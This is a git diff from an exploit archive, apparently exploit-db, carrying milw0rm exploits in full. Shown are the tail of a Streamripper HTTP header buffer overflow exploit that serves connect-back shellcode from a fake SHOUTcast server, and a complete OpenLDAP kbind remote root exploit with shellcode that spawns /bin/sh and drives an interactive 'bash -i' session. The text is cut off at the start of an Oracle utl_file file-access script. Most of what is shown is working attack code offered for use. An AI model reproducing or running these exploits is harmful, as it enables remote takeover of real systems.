+ "\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
+ "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
+ "\x89\xe1\xb0\x0b\xcd\x80";
+
+char http_header[] = "ICY 200 OK\r\n"
+ "icy-notice1:
This stream requires Winamp
\r\n" + "icy-notice2:SHOUTcast Distributed Network Audio Server/unix v1.9.7
\r\n" + "icy-name:SEGFAULT radio\r\n" + "icy-genre:Progressive House\r\n" + "icy-url:http://www.x0n3-h4ck.org\r\n" + "content-type:audio/mpeg\r\n" + "icy-pub:1\r\n" + "icy-metaint:1\r\n" // mp3 metatags starts at first byte of content + "icy-br:"; // Finally here... + +char http_content[] = "\x0d\x0a\x0d\x0a" // \r\n\r\n + "\x04" // this magic byte can be used to control malloc(m_buffersize). m_buffersize is (this-byte * 16 ) TODO: egghunter + "\x53\x74\x72\x65\x61\x6D\x54\x69\x74\x6C\x65\x3D\x27\x45" + "\x78\x70\x61\x6E\x64\x65\x72\x73\x20\x2D\x20\x49\x27\x6C" + "\x6C\x20\x4F\x77\x6E\x20\x59\x6F\x75\x27\x3B\x53\x74\x72" + "\x65\x61\x6D\x55\x72\x6C\x3D\x27\x27\x3B\x00\x00\x00\x00" + "\x00\x00\x00\x00\x00\x00\x00\x00" + "\xd3\xff\xff\xf5\xff\xff\xf9\xaf\xff\xe5\x29\xbe\x3e\x8b\x18"; // a few bytes from an mp3 + + +struct retcodes{char *platform;unsigned long addr;} targets[]= { + { "Debian GNU/Linux testing/unstable" , 0xb7e70090 }, + { "Debian GNU/Linux 3.1", 0xb7e71070 }, + { "Crash daemon - DEBUGGING" , 0xdeadc0de }, + { NULL } +}; +int banner() { + printf("\n[i] Title: \tStreamripper HTTP Header Parsing BOF Exploit\n"); + printf("[i] Discovered by:\tUlf Harnhammar\n"); + printf("[i] Exploit by: \tExpanders\n\n"); + return 0; +} + +int usage(char *filename) { + int i; + printf("Usage: \t%s \n\n",filename); + printf(" \t : Local port for listener :: Default: 8000\n"); + printf(" \t : Local ip address for connectback\n"); + printf(" \t : Local port for connectback\n"); + printf(" \t : Target from the list below\n\n"); + + printf("# \t Address \t Target\n"); + printf("---------------------------------------------------------\n"); + for(i = 0; targets[i].platform; i++) + printf("%d \t 0x%08x \t %s \n",i,targets[i].addr,targets[i].platform); + printf("---------------------------------------------------------\n"); + exit(0); +} + +int inject(char *port, char *ip) +{ + unsigned long m_ip; + unsigned short m_port; + m_ip = inet_addr(ip); + m_port = htons(atoi( port )); + 
memcpy ( &shellcode[26], &m_ip, 4); + memcpy ( &shellcode[32], &m_port, 2); + return 0; +} + +int socket_listen( unsigned short port ) +{ + int s,reuseaddr=1; + struct sockaddr_in localaddr; + struct hostent* host_addr; + + localaddr.sin_family = AF_INET; + localaddr.sin_port = htons(port); + localaddr.sin_addr.s_addr = INADDR_ANY; + bzero(&(localaddr.sin_zero), 8); + + if ( ( s = socket(AF_INET, SOCK_STREAM, 0) ) < 0 ) + { + printf ( "[X] socket() failed!\n" ); + exit ( 1 ); + } + if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,(socklen_t)sizeof(reuseaddr)) < 0) + { + printf("[X] setsockopt() failed!\n"); + exit ( 1 ); + } + if (bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) + { + perror("[X] bind() failed\n"); + exit ( 1 ); + } + if (listen(s, 1) < 0) + { + perror("[X] listen() failed\n"); + exit ( 1 ); + } + return ( s ); +} + +int client_accept( int listener ) +{ + int s; + struct sockaddr_in remoteaddr; + int addrlen = sizeof(struct sockaddr_in); + if ((s = accept(listener, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) + { + perror("[X] accept() failed\n"); + exit ( 1 ); + } + if (getpeername(s, (struct sockaddr *)&remoteaddr, &addrlen) < 0) + { + perror("[X] getpeername() failed\n"); + exit ( 1 ); + } + printf("got connection from %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port)); + return ( s ); +} + + +int main(int argc, char *argv[]) { + int listener,client,position=0; + unsigned int rcv; + char buffer[BUFFSIZE],*request; + char recvbuf[256]; + banner(); + if( (argc != 5) || (atoi(argv[1]) < 1) || (atoi(argv[1]) > 65534) ) + usage(argv[0]); + + printf("[+] Creating evil buffer\n"); + request = (char *) malloc(BUFFSIZE + strlen(http_header) + strlen(http_content)); // +3 == \r + \n + 0x00 + memset(buffer,0x90,BUFFSIZE); // Fill with nops + + inject(argv[3],argv[2]); // Xor port and ip and put them into the shellcode + + position = 156 - strlen(shellcode); // 156 : EIP offset + 
memcpy(buffer+position,shellcode,strlen(shellcode)); + position += strlen(shellcode); + memcpy(buffer+position,&targets[atoi(argv[4])].addr,4); + position += 4; + memset(buffer+position,0x00,1); // End + sprintf(request,"%s%s%s",http_header,buffer,http_content); + + printf("[+] Setting up socket\n"); + listener = socket_listen(atoi(argv[1])); + + printf("[+] Waiting for client..."); + fflush(stdout); + client = client_accept(listener); + + printf("[+] Receiving GET request..."); + fflush(stdout); + rcv=recv(client,recvbuf,256,0); + if(rcv<0) + { + printf("\n[X] Error while recieving banner!\n"); + close(client); + close(listener); + exit( 1 ); + } + if (strstr(recvbuf,"1.61.25")!=0) + { + sleep(1); + printf("ok\n[+] Sending %d bytes of painfull buffer\n",strlen(request)); + if ( send ( client, request, strlen (request), 0) <= 0 ) + { + printf("[X] Failed to send buffer\n"); + exit ( 1 ); + } + printf("[+] Done - Wait for shell on port %s\n",argv[3]); + } else + printf("[X] This client is not running Streamripper or it's an unsupported version\n"); + close(client); + close(listener); + free(request); + return 0; +} + +// milw0rm.com [2006-08-29] diff --git a/platforms/linux/remote/230.c b/platforms/linux/remote/230.c index 2194cf25a..a5fff94cf 100755 --- a/platforms/linux/remote/230.c +++ b/platforms/linux/remote/230.c @@ -395,6 +395,6 @@ void usage(char *prog) printf("-c where we start to control the format string\n\n"); exit(0); } - - -// milw0rm.com [2000-12-15] + + +// milw0rm.com [2000-12-15] diff --git a/platforms/linux/remote/237.c b/platforms/linux/remote/237.c index 82dffdd05..c7d028e74 100755 --- a/platforms/linux/remote/237.c +++ b/platforms/linux/remote/237.c @@ -207,6 +207,6 @@ bool wrongPacket(TCP *p1, TCP *p2) return true; return false; } - - -// milw0rm.com [2001-01-02] + + +// milw0rm.com [2001-01-02] diff --git a/platforms/linux/remote/27.pl b/platforms/linux/remote/27.pl index a07f3c7e3..2f8a6f161 100755 --- a/platforms/linux/remote/27.pl 
+++ b/platforms/linux/remote/27.pl @@ -104,6 +104,6 @@ response\n"; } close LOG; - - -# milw0rm.com [2003-05-05] + + +# milw0rm.com [2003-05-05] diff --git a/platforms/linux/remote/277.c b/platforms/linux/remote/277.c index 37f5c38d5..8ffcadc0c 100755 --- a/platforms/linux/remote/277.c +++ b/platforms/linux/remote/277.c @@ -294,6 +294,6 @@ encode_dns_name (char *buf, int len, int embed_pos) } *buf=0x00; // finish with a 0 } - - -// milw0rm.com [2001-03-01] + + +// milw0rm.com [2001-03-01] diff --git a/platforms/linux/remote/279.c b/platforms/linux/remote/279.c index 1d16df1cc..7469ce883 100755 --- a/platforms/linux/remote/279.c +++ b/platforms/linux/remote/279.c @@ -236,6 +236,6 @@ int main(int argc,char **argv){ err: perror("error");exit(-1); } - - -// milw0rm.com [2001-03-01] + + +// milw0rm.com [2001-03-01] diff --git a/platforms/linux/remote/282.c b/platforms/linux/remote/282.c index 7ac25375a..b2f9955ed 100755 --- a/platforms/linux/remote/282.c +++ b/platforms/linux/remote/282.c @@ -560,6 +560,6 @@ int main(int argc, char* argv[]) connection(sa); return(0); -} - -// milw0rm.com [2001-03-02] +} + +// milw0rm.com [2001-03-02] diff --git a/platforms/linux/remote/2933.c b/platforms/linux/remote/2933.c index 5a7382f1d..5c2d3db6c 100755 --- a/platforms/linux/remote/2933.c +++ b/platforms/linux/remote/2933.c 
@@ -1,381 +1,381 @@ -/* - * openldap-kbind-p00f.c - OpenLDAP kbind remote exploit - * - * Only works on servers compiled with - * --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no] - * - * by Solar Eclipse - * - * Shoutouts to LSD for their l33t asm code and to all 0dd people - * - * Private 0dd code. - * - */ - -#include -#include -#include -#include -#include -#include - -extern int errno; - -#define SHELLCODE_LEN (1250+2+32) -#define SHELLCODE_ADDR 0xbf5feed0 - -#define LDAP_AUTH_SIMPLE 0x80U -#define LDAP_AUTH_KRBV41 0x81U - -#define FINDSCKPORTOFS 46 - -u_char shellcode[]= -/* 72 bytes findsckcode by LSD-pl */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x89\xe7" /* movl %esp,%edi */ - "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ - "\x89\x77\x04" /* movl %esi,0x4(%edi) */ - "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ - "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ - "\xb3\x10" /* movb $0x10,%bl */ - "\x89\x19" /* movl %ebx,(%ecx) */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\xff" /* movb $0xff,%cl */ - "\x89\x0f" /* movl %ecx,(%edi) */ - "\x51" /* pushl %ecx */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x66" /* movb $0x66,%al */ - "\xb3\x07" /* movb $0x07,%bl */ - "\x89\xf9" /* movl %edi,%ecx */ - "\xcd\x80" /* int $0x80 */ - "\x59" /* popl %ecx */ - "\x31\xdb" /* xorl %ebx,%ebx */ - "\x39\xd8" /* cmpl %ebx,%eax */ - "\x75\x0a" /* jne */ - "\x66\xb8\x12\x34" /* movw $0x1234,%bx */ - "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */ - "\x74\x02" /* je */ - "\xe2\xe0" /* loop */ - "\x89\xcb" /* movl %ecx,%ebx */ - "\x31\xc9" /* xorl %ecx,%ecx */ - "\xb1\x03" /* movb $0x03,%cl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\xb0\x3f" /* movb $0x3f,%al */ - "\x49" /* decl %ecx */ - "\xcd\x80" /* int $0x80 */ - "\x41" /* incl %ecx */ - "\xe2\xf6" /* loop */ - -/* 10 byte setresuid(0,0,0); by core */ - "\x31\xc9" /* xor %ecx,%ecx */ - "\xf7\xe1" /* mul %ecx,%eax */ - "\x51" /* push %ecx */ - "\x5b" /* pop %ebx */ - "\xb0\xa4" /* mov $0xa4,%al */ - "\xcd\x80" /* int $0x80 */ - -/* 24 
bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */ - "\x31\xc0" /* xorl %eax,%eax */ - "\x50" /* pushl %eax */ - "\x68""//sh" /* pushl $0x68732f2f */ - "\x68""/bin" /* pushl $0x6e69622f */ - "\x89\xe3" /* movl %esp,%ebx */ - "\x50" /* pushl %eax */ - "\x53" /* pushl %ebx */ - "\x89\xe1" /* movl %esp,%ecx */ - "\x99" /* cdql */ - "\xb0\x0b" /* movb $0x0b,%al */ - "\xcd\x80" /* int $0x80 */ -; - -#define COMMAND1 "echo 'a'; TERM=xterm; export TERM=xterm; exec bash -i;\n" -#define COMMAND2 "uname -a; id; w;\n" - -/* mixter's code w/enhancements by core */ - -int sh(int sockfd) { - char snd[1024], rcv[1024]; - fd_set rset; - int maxfd, n; - - /* Priming commands */ - strcpy(snd, COMMAND1 "\n"); - write(sockfd, snd, strlen(snd)); - - strcpy(snd, COMMAND2 "\n"); - write(sockfd, snd, strlen(snd)); - - /* Main command loop */ - for (;;) { - FD_SET(fileno(stdin), &rset); - FD_SET(sockfd, &rset); - - maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; - select(maxfd, &rset, NULL, NULL, NULL); - - if (FD_ISSET(fileno(stdin), &rset)) { - bzero(snd, sizeof(snd)); - fgets(snd, sizeof(snd)-2, stdin); - write(sockfd, snd, strlen(snd)); - } - - if (FD_ISSET(sockfd, &rset)) { - bzero(rcv, sizeof(rcv)); - - if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { - printf("Good Bye!\n"); - return 0; - } - - if (n < 0) { - perror("read"); - return 1; - } - - fputs(rcv, stdout); - fflush(stdout); /* keeps output nice */ - } - } /* for(;;) */ -} - -/* Connect to the host */ -int connect_host(char* host, int port) -{ - struct sockaddr_in s_in; - int sock; - - s_in.sin_family = AF_INET; - s_in.sin_addr.s_addr = inet_addr(host); - s_in.sin_port = htons(port); - - if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) { - printf("Could not create a socket\n"); - exit(1); - } - - if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) { - printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno)); - exit(1); - } - - return sock; -} - -int get_local_port(int sock) -{ - 
struct sockaddr_in s_in; - int namelen = sizeof(s_in); - - if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) { - printf("Can't get local port: %s\n", strerror(errno)); - exit(1); - } - - return s_in.sin_port; -} - -int read_data(int sock, char* buf, int len) -{ - int l; - int to_read = len; - - do { - if ((l = read(sock, buf, to_read)) < 0) { - printf("Error in read: %s\n", strerror(errno)); - exit(1); - } - to_read -= len; - } while (to_read > 0); - - return len; -} - -int read_bind_result(int sock) -{ - char buf[1000]; - - read_data(sock, buf, 2); - if (buf[0] != 0x30) { - /* openldap is 0wned :-P */ - return -1; - } - - read_data(sock, &buf[2], buf[1]); - - if ((buf[2] != 0x02) && (buf[3] != 0x01)) { /* message id */ - printf("Malformed bind result\n"); - exit(1); - } - - if (buf[5] != 0x61) { /* message type */ - printf("Malformed bind result\n"); - exit(1); - } - - if (buf[6] < 7) { /* message length */ - printf("Malformed bind result\n"); - exit(1); - } - - if ((buf[7] != 0x0a) && (buf[8] != 0x01)) { /* result code */ - printf("Malformed bind result\n"); - exit(1); - } - - return buf[9]; /* result code */ -} - -int send_bind_request(int sock, char method, char* dn, char* cred) -{ - int cred_len, message_len, request_len; - char krb_bind_request[2000]; - char* p; - - memcpy(krb_bind_request, - "\x30\x82\xff\xff" /* request length */ - "\x02\x01\x01" /* message id = 1 */ - "\x60" /* bind request */ - "\x82\xff\xff" /* message length */ - "\x02\x01\x02" /* LDAP version 3 */ - "\x04", /* dn */ - 15); - - p = &krb_bind_request[15]; - - if (strlen(dn) > 255) { - printf("bind_dn too long\n"); - exit(1); - } - - *p++ = (char)strlen(dn); - strcpy(p, dn); - - p += strlen(dn); - - *p++ = method; /* authentication method */ - *p++ = '\x82'; - - cred_len = strlen(cred); - - *p++ = (char) ((cred_len >> 8) & 0xff); - *p++ = (char) (cred_len & 0xff); - - strcpy(p, cred); - - message_len = 5 + strlen(dn) + 4 + cred_len; - krb_bind_request[9] = (char) 
((message_len >> 8) & 0xff); - krb_bind_request[10] = (char) (message_len & 0xff); - - request_len = 7 + message_len; - krb_bind_request[2] = (char) ((request_len >> 8) & 0xff); - krb_bind_request[3] = (char) (request_len & 0xff); - - send(sock, krb_bind_request, 4+request_len, 0); -} - -void build_shellcode(char* p, int len) -{ - int i; - - i = len - 64 - strlen(shellcode); - memset(p, 0x90, i); - strncpy(&p[i], shellcode, strlen(shellcode)); - - for (i = len - 64; i < len; i+= 4) { - *(int*)&p[i] = SHELLCODE_ADDR; - } -} - -char res_buf[30]; - -char* ldap_result(int code) { - switch (code) { - case 0x00: return "LDAP_SUCCESS (0x00)"; - case 0x01: return "LDAP_OPERATIONS_ERROR (0x01)"; - case 0x02: return "LDAP_PROTOCOL_ERROR (0x02)"; - case 0x07: return "LDAP_AUTH_METHOD_NOT_SUPPORTED (0x07)\nMost likely cause: the OpenLDAP server was not compiled with --enable-kbind."; - case 0x08: return "LDAP_STRONG_AUTH_REQUIRED (0x08)"; - case 0x0e: return "LDAP_SASL_BIND_IN_PROGRESS (0x0e)"; - case 0x22: return "LDAP_INVALID_DN_SYNTAX (0x22)\nCheck your bind_dn."; - case 0x30: return "LDAP_INAPPROPRIATE_AUTH (0x30)"; - case 0x31: return "LDAP_INVALID_CREDENTIALS (0x31)\nThe bind_dn must exist in the LDAP directory."; - case 0x32: return "LDAP_INSUFFICIENT_ACCESS (0x32)"; - case 0x33: return "LDAP_BUSY (0x33)"; - case 0x34: return "LDAP_UNAVAILABLE (0x34)"; - case 0x35: return "LDAP_UNWILLING_TO_PERFORM (0x35)"; - case 0x50: return "LDAP_OTHER (0x50)"; - case 0x51: return "LDAP_SERVER_DOWN (0x51)"; - case 0x54: return "LDAP_DECODING_ERROR (0x54)"; - default: - sprintf(res_buf, "%x", code); - return res_buf; - } -} - -/* run, code, run */ -int main(int argc, char* argv[]) -{ - char shellcode_buf[SHELLCODE_LEN+1]; - int port, sock, res; - char* dn; - char* p; - - printf(": openldap-kbind-p00f.c - OpenLDAP kbind remote exploit\n"); - printf("\n"); - printf(": Only works on servers compiled with\n"); - printf(" --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) 
[no]\n"); - printf("\n"); - printf(": by Solar Eclipse \n\n"); - - if (argc < 3) { - printf(": Usage: %s hostname bind_dn\n", argv[0]); - printf(" The bind_dn must exist in the LDAP directory.\n"); - exit(1); - } - - dn = argv[2]; - - port = 389; /*atoi(argv[2]);*/ - sock = connect_host(argv[1], port); - -/* - send_bind_request(sock, LDAP_AUTH_SIMPLE, dn, "secret"); - res = read_bind_result(sock); - printf("LDAP_AUTH_SIMPLE bind request returned %s\n", ldap_result(res)); -*/ - -/* send_bind_request(sock, LDAP_AUTH_KRBV41, dn, "secret"); - res = read_bind_result(sock); - printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); -*/ - port = get_local_port(sock); - - shellcode[FINDSCKPORTOFS] = (char) (port & 0xff); - shellcode[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff); - - build_shellcode(shellcode_buf, SHELLCODE_LEN); - shellcode_buf[SHELLCODE_LEN] = '\0'; - - printf("Sending shellcode\n"); - send_bind_request(sock, LDAP_AUTH_KRBV41, dn, shellcode_buf); - - sleep(2); - - /* Priming commands */ - write(sock, "echo 'a';\n", 10); - - printf("Reading bind result\n"); - res = read_bind_result(sock); - if (res > 0) - printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); - else { - printf("Spawning shell...\n"); - sh(sock); - } - - close(sock); - - return 0; -} - -// milw0rm.com [2006-12-15] +/* + * openldap-kbind-p00f.c - OpenLDAP kbind remote exploit + * + * Only works on servers compiled with + * --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no] + * + * by Solar Eclipse + * + * Shoutouts to LSD for their l33t asm code and to all 0dd people + * + * Private 0dd code. 
+ * + */ + +#include +#include +#include +#include +#include +#include + +extern int errno; + +#define SHELLCODE_LEN (1250+2+32) +#define SHELLCODE_ADDR 0xbf5feed0 + +#define LDAP_AUTH_SIMPLE 0x80U +#define LDAP_AUTH_KRBV41 0x81U + +#define FINDSCKPORTOFS 46 + +u_char shellcode[]= +/* 72 bytes findsckcode by LSD-pl */ + "\x31\xdb" /* xorl %ebx,%ebx */ + "\x89\xe7" /* movl %esp,%edi */ + "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ + "\x89\x77\x04" /* movl %esi,0x4(%edi) */ + "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ + "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ + "\xb3\x10" /* movb $0x10,%bl */ + "\x89\x19" /* movl %ebx,(%ecx) */ + "\x31\xc9" /* xorl %ecx,%ecx */ + "\xb1\xff" /* movb $0xff,%cl */ + "\x89\x0f" /* movl %ecx,(%edi) */ + "\x51" /* pushl %ecx */ + "\x31\xc0" /* xorl %eax,%eax */ + "\xb0\x66" /* movb $0x66,%al */ + "\xb3\x07" /* movb $0x07,%bl */ + "\x89\xf9" /* movl %edi,%ecx */ + "\xcd\x80" /* int $0x80 */ + "\x59" /* popl %ecx */ + "\x31\xdb" /* xorl %ebx,%ebx */ + "\x39\xd8" /* cmpl %ebx,%eax */ + "\x75\x0a" /* jne */ + "\x66\xb8\x12\x34" /* movw $0x1234,%bx */ + "\x66\x39\x46\x02" /* cmpw %bx,0x2(%esi) */ + "\x74\x02" /* je */ + "\xe2\xe0" /* loop */ + "\x89\xcb" /* movl %ecx,%ebx */ + "\x31\xc9" /* xorl %ecx,%ecx */ + "\xb1\x03" /* movb $0x03,%cl */ + "\x31\xc0" /* xorl %eax,%eax */ + "\xb0\x3f" /* movb $0x3f,%al */ + "\x49" /* decl %ecx */ + "\xcd\x80" /* int $0x80 */ + "\x41" /* incl %ecx */ + "\xe2\xf6" /* loop */ + +/* 10 byte setresuid(0,0,0); by core */ + "\x31\xc9" /* xor %ecx,%ecx */ + "\xf7\xe1" /* mul %ecx,%eax */ + "\x51" /* push %ecx */ + "\x5b" /* pop %ebx */ + "\xb0\xa4" /* mov $0xa4,%al */ + "\xcd\x80" /* int $0x80 */ + +/* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68""//sh" /* pushl $0x68732f2f */ + "\x68""/bin" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\x89\xe1" /* movl %esp,%ecx */ + "\x99" 
/* cdql */ + "\xb0\x0b" /* movb $0x0b,%al */ + "\xcd\x80" /* int $0x80 */ +; + +#define COMMAND1 "echo 'a'; TERM=xterm; export TERM=xterm; exec bash -i;\n" +#define COMMAND2 "uname -a; id; w;\n" + +/* mixter's code w/enhancements by core */ + +int sh(int sockfd) { + char snd[1024], rcv[1024]; + fd_set rset; + int maxfd, n; + + /* Priming commands */ + strcpy(snd, COMMAND1 "\n"); + write(sockfd, snd, strlen(snd)); + + strcpy(snd, COMMAND2 "\n"); + write(sockfd, snd, strlen(snd)); + + /* Main command loop */ + for (;;) { + FD_SET(fileno(stdin), &rset); + FD_SET(sockfd, &rset); + + maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1; + select(maxfd, &rset, NULL, NULL, NULL); + + if (FD_ISSET(fileno(stdin), &rset)) { + bzero(snd, sizeof(snd)); + fgets(snd, sizeof(snd)-2, stdin); + write(sockfd, snd, strlen(snd)); + } + + if (FD_ISSET(sockfd, &rset)) { + bzero(rcv, sizeof(rcv)); + + if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) { + printf("Good Bye!\n"); + return 0; + } + + if (n < 0) { + perror("read"); + return 1; + } + + fputs(rcv, stdout); + fflush(stdout); /* keeps output nice */ + } + } /* for(;;) */ +} + +/* Connect to the host */ +int connect_host(char* host, int port) +{ + struct sockaddr_in s_in; + int sock; + + s_in.sin_family = AF_INET; + s_in.sin_addr.s_addr = inet_addr(host); + s_in.sin_port = htons(port); + + if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) { + printf("Could not create a socket\n"); + exit(1); + } + + if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) { + printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno)); + exit(1); + } + + return sock; +} + +int get_local_port(int sock) +{ + struct sockaddr_in s_in; + int namelen = sizeof(s_in); + + if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) { + printf("Can't get local port: %s\n", strerror(errno)); + exit(1); + } + + return s_in.sin_port; +} + +int read_data(int sock, char* buf, int len) +{ + int l; + int to_read = len; + + do { + if 
((l = read(sock, buf, to_read)) < 0) { + printf("Error in read: %s\n", strerror(errno)); + exit(1); + } + to_read -= len; + } while (to_read > 0); + + return len; +} + +int read_bind_result(int sock) +{ + char buf[1000]; + + read_data(sock, buf, 2); + if (buf[0] != 0x30) { + /* openldap is 0wned :-P */ + return -1; + } + + read_data(sock, &buf[2], buf[1]); + + if ((buf[2] != 0x02) && (buf[3] != 0x01)) { /* message id */ + printf("Malformed bind result\n"); + exit(1); + } + + if (buf[5] != 0x61) { /* message type */ + printf("Malformed bind result\n"); + exit(1); + } + + if (buf[6] < 7) { /* message length */ + printf("Malformed bind result\n"); + exit(1); + } + + if ((buf[7] != 0x0a) && (buf[8] != 0x01)) { /* result code */ + printf("Malformed bind result\n"); + exit(1); + } + + return buf[9]; /* result code */ +} + +int send_bind_request(int sock, char method, char* dn, char* cred) +{ + int cred_len, message_len, request_len; + char krb_bind_request[2000]; + char* p; + + memcpy(krb_bind_request, + "\x30\x82\xff\xff" /* request length */ + "\x02\x01\x01" /* message id = 1 */ + "\x60" /* bind request */ + "\x82\xff\xff" /* message length */ + "\x02\x01\x02" /* LDAP version 3 */ + "\x04", /* dn */ + 15); + + p = &krb_bind_request[15]; + + if (strlen(dn) > 255) { + printf("bind_dn too long\n"); + exit(1); + } + + *p++ = (char)strlen(dn); + strcpy(p, dn); + + p += strlen(dn); + + *p++ = method; /* authentication method */ + *p++ = '\x82'; + + cred_len = strlen(cred); + + *p++ = (char) ((cred_len >> 8) & 0xff); + *p++ = (char) (cred_len & 0xff); + + strcpy(p, cred); + + message_len = 5 + strlen(dn) + 4 + cred_len; + krb_bind_request[9] = (char) ((message_len >> 8) & 0xff); + krb_bind_request[10] = (char) (message_len & 0xff); + + request_len = 7 + message_len; + krb_bind_request[2] = (char) ((request_len >> 8) & 0xff); + krb_bind_request[3] = (char) (request_len & 0xff); + + send(sock, krb_bind_request, 4+request_len, 0); +} + +void build_shellcode(char* p, int len) +{ 
+ int i; + + i = len - 64 - strlen(shellcode); + memset(p, 0x90, i); + strncpy(&p[i], shellcode, strlen(shellcode)); + + for (i = len - 64; i < len; i+= 4) { + *(int*)&p[i] = SHELLCODE_ADDR; + } +} + +char res_buf[30]; + +char* ldap_result(int code) { + switch (code) { + case 0x00: return "LDAP_SUCCESS (0x00)"; + case 0x01: return "LDAP_OPERATIONS_ERROR (0x01)"; + case 0x02: return "LDAP_PROTOCOL_ERROR (0x02)"; + case 0x07: return "LDAP_AUTH_METHOD_NOT_SUPPORTED (0x07)\nMost likely cause: the OpenLDAP server was not compiled with --enable-kbind."; + case 0x08: return "LDAP_STRONG_AUTH_REQUIRED (0x08)"; + case 0x0e: return "LDAP_SASL_BIND_IN_PROGRESS (0x0e)"; + case 0x22: return "LDAP_INVALID_DN_SYNTAX (0x22)\nCheck your bind_dn."; + case 0x30: return "LDAP_INAPPROPRIATE_AUTH (0x30)"; + case 0x31: return "LDAP_INVALID_CREDENTIALS (0x31)\nThe bind_dn must exist in the LDAP directory."; + case 0x32: return "LDAP_INSUFFICIENT_ACCESS (0x32)"; + case 0x33: return "LDAP_BUSY (0x33)"; + case 0x34: return "LDAP_UNAVAILABLE (0x34)"; + case 0x35: return "LDAP_UNWILLING_TO_PERFORM (0x35)"; + case 0x50: return "LDAP_OTHER (0x50)"; + case 0x51: return "LDAP_SERVER_DOWN (0x51)"; + case 0x54: return "LDAP_DECODING_ERROR (0x54)"; + default: + sprintf(res_buf, "%x", code); + return res_buf; + } +} + +/* run, code, run */ +int main(int argc, char* argv[]) +{ + char shellcode_buf[SHELLCODE_LEN+1]; + int port, sock, res; + char* dn; + char* p; + + printf(": openldap-kbind-p00f.c - OpenLDAP kbind remote exploit\n"); + printf("\n"); + printf(": Only works on servers compiled with\n"); + printf(" --enable-kbind enable LDAPv2+ Kerberos IV bind (deprecated) [no]\n"); + printf("\n"); + printf(": by Solar Eclipse \n\n"); + + if (argc < 3) { + printf(": Usage: %s hostname bind_dn\n", argv[0]); + printf(" The bind_dn must exist in the LDAP directory.\n"); + exit(1); + } + + dn = argv[2]; + + port = 389; /*atoi(argv[2]);*/ + sock = connect_host(argv[1], port); + +/* + send_bind_request(sock, 
LDAP_AUTH_SIMPLE, dn, "secret"); + res = read_bind_result(sock); + printf("LDAP_AUTH_SIMPLE bind request returned %s\n", ldap_result(res)); +*/ + +/* send_bind_request(sock, LDAP_AUTH_KRBV41, dn, "secret"); + res = read_bind_result(sock); + printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); +*/ + port = get_local_port(sock); + + shellcode[FINDSCKPORTOFS] = (char) (port & 0xff); + shellcode[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff); + + build_shellcode(shellcode_buf, SHELLCODE_LEN); + shellcode_buf[SHELLCODE_LEN] = '\0'; + + printf("Sending shellcode\n"); + send_bind_request(sock, LDAP_AUTH_KRBV41, dn, shellcode_buf); + + sleep(2); + + /* Priming commands */ + write(sock, "echo 'a';\n", 10); + + printf("Reading bind result\n"); + res = read_bind_result(sock); + if (res > 0) + printf("LDAP_AUTH_KRBV41 bind request returned %s\n", ldap_result(res)); + else { + printf("Spawning shell...\n"); + sh(sock); + } + + close(sock); + + return 0; +} + +// milw0rm.com [2006-12-15] diff --git a/platforms/linux/remote/2959.sql b/platforms/linux/remote/2959.sql index 8da0f3ca3..dd8f365dc 100755 --- a/platforms/linux/remote/2959.sql +++ b/platforms/linux/remote/2959.sql 
@@ -1,77 +1,77 @@ --- --- $Id: raptor_orafile.sql,v 1.1 2006/12/19 14:21:00 raptor Exp $ --- --- raptor_orafile.sql - file system access suite for oracle --- Copyright (c) 2006 Marco Ivaldi --- --- This is an example file system access suite for Oracle based on the utl_file --- package (http://www.adp-gmbh.ch/ora/plsql/utl_file.html). Use it to remotely --- read/write OS files with the privileges of the RDBMS user, without the need --- for any special privileges (CONNECT and RESOURCE roles are more than enough). --- --- The database _must_ be configured with a non-NULL utl_file_dir value --- (preferably '*'). Check it using the following query: --- SQL> select name, value from v$parameter where name = 'utl_file_dir'; --- --- If you have the required privileges (ALTER SYSTEM) and feel brave --- enough to perform a DBMS shutdown/startup, you can consider modifying --- this parameter yourself, using the following PL/SQL: --- SQL> alter system set utl_file_dir='*' scope 